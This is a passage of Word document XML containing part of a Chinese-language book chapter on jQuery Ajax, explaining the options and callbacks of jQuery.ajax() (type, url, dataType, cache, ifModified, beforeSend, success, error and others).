    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.get("data.txt")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>.success(function(data){console.log("Got",data);})</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>.success(function(data){process(data);});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para08"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:t>通用选项</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.ajax()</w:t>
      </w:r>
      <w:r>
        <w:t>中最常用的选项如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>type</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>指定</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>的请求方法。默认是</w:t>
      </w:r>
      <w:r>
        <w:t>"GET"</w:t>
      </w:r>
      <w:r>
        <w:t>。另一个常用值是</w:t>
      </w:r>
      <w:r>
        <w:t>"POST"</w:t>
      </w:r>
      <w:r>
        <w:t>。可以指定其他</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>的请求方法，比如</w:t>
      </w:r>
      <w:r>
        <w:t>"DELETE"</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>"PUSH"</w:t>
      </w:r>
      <w:r>
        <w:t>，但不是所有浏览器都支持它们。注意：该选项的命名有误导嫌疑：该选项与请求或响应的数据类型没有任何关系，或许取名为</w:t>
      </w:r>
      <w:r>
        <w:t>"method"</w:t>
      </w:r>
      <w:r>
        <w:t>或是一个更好的选择。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>url</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>要获取的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>。对于</w:t>
      </w:r>
      <w:r>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:t>请求，</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>选项会添加到该</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>后。对于</w:t>
      </w:r>
      <w:r>
        <w:t>JSONP</w:t>
      </w:r>
      <w:r>
        <w:t>请求，当</w:t>
      </w:r>
      <w:r>
        <w:t>cache</w:t>
      </w:r>
      <w:r>
        <w:t>选项为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>时，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>可以添加参数到</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>添加到</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>中（对</w:t>
      </w:r>
      <w:r>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:t>请求）或在请求的内容体中（对</w:t>
      </w:r>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:t>OST</w:t>
      </w:r>
      <w:r>
        <w:t>请求）发送的数据。这可以是字符串或对象。通常会把对象转化为字符串，就如</w:t>
      </w:r>
      <w:r>
        <w:t>19.6.2</w:t>
      </w:r>
      <w:r>
        <w:t>节下面的</w:t>
      </w:r>
      <w:r>
        <w:t>"2.jQuery.getJSON()"</w:t>
      </w:r>
      <w:r>
        <w:t>节中描述的一样，除了在</w:t>
      </w:r>
      <w:r>
        <w:t>process data</w:t>
      </w:r>
      <w:r>
        <w:t>选项中描述的异常情况。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>dataType</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>指定响应数据的预期类型，以及</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>处理该数据的方式。合法值是</w:t>
      </w:r>
      <w:r>
        <w:t>"text"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"html"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"script"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"json"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"jsonp"</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>"xml"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>19.6.2</w:t>
      </w:r>
      <w:r>
        <w:t>节下面的</w:t>
      </w:r>
      <w:r>
        <w:t>“3.jQuery.get()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.post()”</w:t>
      </w:r>
      <w:r>
        <w:t>节中有解释这些</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>值的含义。该选项没有默认值。当没有指定时</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>会检查响应中的</w:t>
      </w:r>
      <w:r>
        <w:t>Content-Type</w:t>
      </w:r>
      <w:r>
        <w:t>头来确定如何处理返回的数据。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>contentType</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>指定请求的</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP Content-Type</w:t>
      </w:r>
      <w:r>
        <w:t>头。默认是</w:t>
      </w:r>
      <w:r>
        <w:t>"application/x-www-form-urlencoded"</w:t>
      </w:r>
      <w:r>
        <w:t>，这是</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>表单和绝大部分服务器脚本使用的正常值。如果将</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>选项设置为</w:t>
      </w:r>
      <w:r>
        <w:t>"POST"</w:t>
      </w:r>
      <w:r>
        <w:t>，想发送纯文本或</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>文档作为请求体时，需要设置该选项。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>timeout</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>超时时间，单位是毫秒。如果设置了该选项，当请求没有在指定超时时间内完成时，请求会取消同时触发</w:t>
      </w:r>
      <w:r>
        <w:t>error</w:t>
      </w:r>
      <w:r>
        <w:t>回调，回调中的状态</w:t>
      </w:r>
      <w:r>
        <w:t>码参数为</w:t>
      </w:r>
      <w:r>
        <w:t>"timeout"</w:t>
      </w:r>
      <w:r>
        <w:t>。默认超时时间是</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>，表示除非请求完成，否则永远不会取消。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>cache</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对于</w:t>
      </w:r>
      <w:r>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:t>请求，如果该选项设置为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>会添加一个</w:t>
      </w:r>
      <w:r>
        <w:t>“_=”</w:t>
      </w:r>
      <w:r>
        <w:t>参数到</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>中，或者替换已经存在的同名参数。该参数的值是当前时间（毫秒格式）。这可以禁用基于浏览器的缓存，因为每次请求的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>都不一样。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ifModified</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当该选项设置为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>时，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>会为请求的每一个</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>记录</w:t>
      </w:r>
      <w:r>
        <w:t>Last-Modified</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>If-None-Match</w:t>
      </w:r>
      <w:r>
        <w:t>响应头的值，并会在接下来的请求中为相同的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>设置这些头部信息。</w:t>
      </w:r>
      <w:r>
        <w:t>这可以使得，如果上次请求后</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的内容没有改变，则服务器会发送回</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP 304"Not Modified"</w:t>
      </w:r>
      <w:r>
        <w:t>响应。默认情况下，该选项未设置，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>不会设置或记录这些头部信息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">HTTP </w:t>
      </w:r>
      <w:r>
        <w:t>304</w:t>
      </w:r>
      <w:r>
        <w:t>响应解释成</w:t>
      </w:r>
      <w:r>
        <w:t>"notmodified"</w:t>
      </w:r>
      <w:r>
        <w:t>状态码。</w:t>
      </w:r>
      <w:r>
        <w:t>"notmodified"</w:t>
      </w:r>
      <w:r>
        <w:t>状态不会被当成错误，传入</w:t>
      </w:r>
      <w:r>
        <w:t>success</w:t>
      </w:r>
      <w:r>
        <w:t>回调中的状态码是</w:t>
      </w:r>
      <w:r>
        <w:t>"notmodified"</w:t>
      </w:r>
      <w:r>
        <w:t>，而不是通常的</w:t>
      </w:r>
      <w:r>
        <w:t>"success"</w:t>
      </w:r>
      <w:r>
        <w:t>状态码。因此，如果设置了</w:t>
      </w:r>
      <w:r>
        <w:t>ifModified</w:t>
      </w:r>
      <w:r>
        <w:t>选项，就必须在回调中检查该状态码</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>如果状态码是</w:t>
      </w:r>
      <w:r>
        <w:t>"notmodified"</w:t>
      </w:r>
      <w:r>
        <w:t>，则第一个参数（响应数据）会是</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>。注意</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery 1.4</w:t>
      </w:r>
      <w:r>
        <w:t>及其之前的版本，</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP 304</w:t>
      </w:r>
      <w:r>
        <w:t>会被当成一个错误，</w:t>
      </w:r>
      <w:r>
        <w:t>"notmodified"</w:t>
      </w:r>
      <w:r>
        <w:t>状态码会被传入</w:t>
      </w:r>
      <w:r>
        <w:t>error</w:t>
      </w:r>
      <w:r>
        <w:t>回调中，而不是</w:t>
      </w:r>
      <w:r>
        <w:t>suceess</w:t>
      </w:r>
      <w:r>
        <w:t>回调</w:t>
      </w:r>
      <w:r>
        <w:t>中。请参考</w:t>
      </w:r>
      <w:r>
        <w:t>19.6.1</w:t>
      </w:r>
      <w:r>
        <w:t>节中的信息，以获取</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>状态码的更多信息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>global</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>该选项指定</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>是否应该触发上面描述的</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>请求过程中的事件。默认值是</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>；设置该选项为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>会禁用</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>相关的所有事件。（参考</w:t>
      </w:r>
      <w:r>
        <w:t>19.6.4</w:t>
      </w:r>
      <w:r>
        <w:t>节获取事件的细节。）该选项的命名有些令人</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>迷惑：取名为</w:t>
      </w:r>
      <w:r>
        <w:t>"global"</w:t>
      </w:r>
      <w:r>
        <w:t>是因为</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>通常会全局地触发这些事件，而不是在具体某个对象上。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para08"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:t>回调</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>下面的选项指定在</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>请求的不同阶段调用的函数。</w:t>
      </w:r>
      <w:r>
        <w:t>success</w:t>
      </w:r>
      <w:r>
        <w:t>选项已经很熟悉了：这是传入给</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.ge</w:t>
      </w:r>
      <w:r>
        <w:t>tJSON()</w:t>
      </w:r>
      <w:r>
        <w:t>等方法的回调函数。注意</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>也会将</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>请求过程的消息当做事件发送（除非设置了</w:t>
      </w:r>
      <w:r>
        <w:t>global</w:t>
      </w:r>
      <w:r>
        <w:t>选项为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>context</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>该选项指定回调函数在调用时的上下文对象</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>就是</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>。该选项没有默认值，如果不设置，</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>会指向选项对象。设置</w:t>
      </w:r>
      <w:r>
        <w:t>context</w:t>
      </w:r>
      <w:r>
        <w:t>选项也会影响</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>事件触发的方式（参考</w:t>
      </w:r>
      <w:r>
        <w:t>19.6.4</w:t>
      </w:r>
      <w:r>
        <w:t>节）。如果设置该选项，值应该为</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>或触发事件所在的</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>beforeSend</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>该选项指定</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>请求发送到服务器之前激活的回调函数。第一个参数是</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象，第二个参数是该请求的选项对象。</w:t>
      </w:r>
      <w:r>
        <w:t>beforeSend</w:t>
      </w:r>
      <w:r>
        <w:t>回调使得程序有机会在</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象上设置自定义</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>头部。如果该回调函数返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>请求会取消。注意</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>跨域的</w:t>
      </w:r>
      <w:r>
        <w:t>"script"</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>"jsonp"</w:t>
      </w:r>
      <w:r>
        <w:t>请求没有使用</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象，因此不会触发</w:t>
      </w:r>
      <w:r>
        <w:t>beforeSend</w:t>
      </w:r>
      <w:r>
        <w:t>回调。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>success</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>该选项指定</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>请求成功完成时调用的回调函数。第一个参数是服务器发送的数据，第二个参数是</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>状态码；第三个参数是用来发送该请求的</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRe</w:t>
      </w:r>
      <w:r>
        <w:t>quest</w:t>
      </w:r>
      <w:r>
        <w:t>对象。如</w:t>
      </w:r>
      <w:r>
        <w:t>19.6.2</w:t>
      </w:r>
      <w:r>
        <w:t>节下面的</w:t>
      </w:r>
      <w:r>
        <w:t>“3.jQuery.get()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.post()”</w:t>
      </w:r>
      <w:r>
        <w:t>节所描述，第一个参数的类型取决于</w:t>
      </w:r>
      <w:r>
        <w:t>dataType</w:t>
      </w:r>
      <w:r>
        <w:t>选项或服务器响应的</w:t>
      </w:r>
      <w:r>
        <w:t>Content-Type</w:t>
      </w:r>
      <w:r>
        <w:t>头信息。如果类型是</w:t>
      </w:r>
      <w:r>
        <w:t>"xml"</w:t>
      </w:r>
      <w:r>
        <w:t>，则第一个参数是</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象。如果类型是</w:t>
      </w:r>
      <w:r>
        <w:t>"json"</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>"jsonp"</w:t>
      </w:r>
      <w:r>
        <w:t>，第一个参数是服务器返回的</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>格式响应的解析结果。如果类型是</w:t>
      </w:r>
      <w:r>
        <w:t>"script"</w:t>
      </w:r>
      <w:r>
        <w:t>，则响应内容是所加载脚本的文本内容（该脚本已经执行了，因此，在这种情况下通常可以忽略响应内容）。对于其他类型，响应内容直接就是请求资源的文本</w:t>
      </w:r>
      <w:r>
        <w:t>内容。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>第二个参数的状态码通常是字符串</w:t>
      </w:r>
      <w:r>
        <w:t>"success"</w:t>
      </w:r>
      <w:r>
        <w:t>，但是如果设置了</w:t>
      </w:r>
      <w:r>
        <w:t>ifModified</w:t>
      </w:r>
      <w:r>
        <w:t>选项，该参数就可能是</w:t>
      </w:r>
      <w:r>
        <w:t>"notmodified"</w:t>
      </w:r>
      <w:r>
        <w:t>。在这种情况下，服务器不发送响应并且不定义第</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>个参数。</w:t>
      </w:r>
      <w:r>
        <w:t>"script"</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>"jsonp"</w:t>
      </w:r>
      <w:r>
        <w:t>类型的垮域请求通过＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素而不是</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>执行，因此对于那些请求，不会定义第三个参数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>error</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>该选项指定</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>请求不成功时调用的回调函数。该回调的第一个参数是该请求的</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象（如果用到的话）。第二个参数是</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的状态码。对于</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>错误，该状态码可能是</w:t>
      </w:r>
      <w:r>
        <w:t>"error"</w:t>
      </w:r>
      <w:r>
        <w:t>，对于超时，则是</w:t>
      </w:r>
      <w:r>
        <w:t>"timeout"</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>"parsererror"</w:t>
      </w:r>
      <w:r>
        <w:t>则表示解析服务器响应时出了问题。例如，如果</w:t>
      </w:r>
      <w:r>
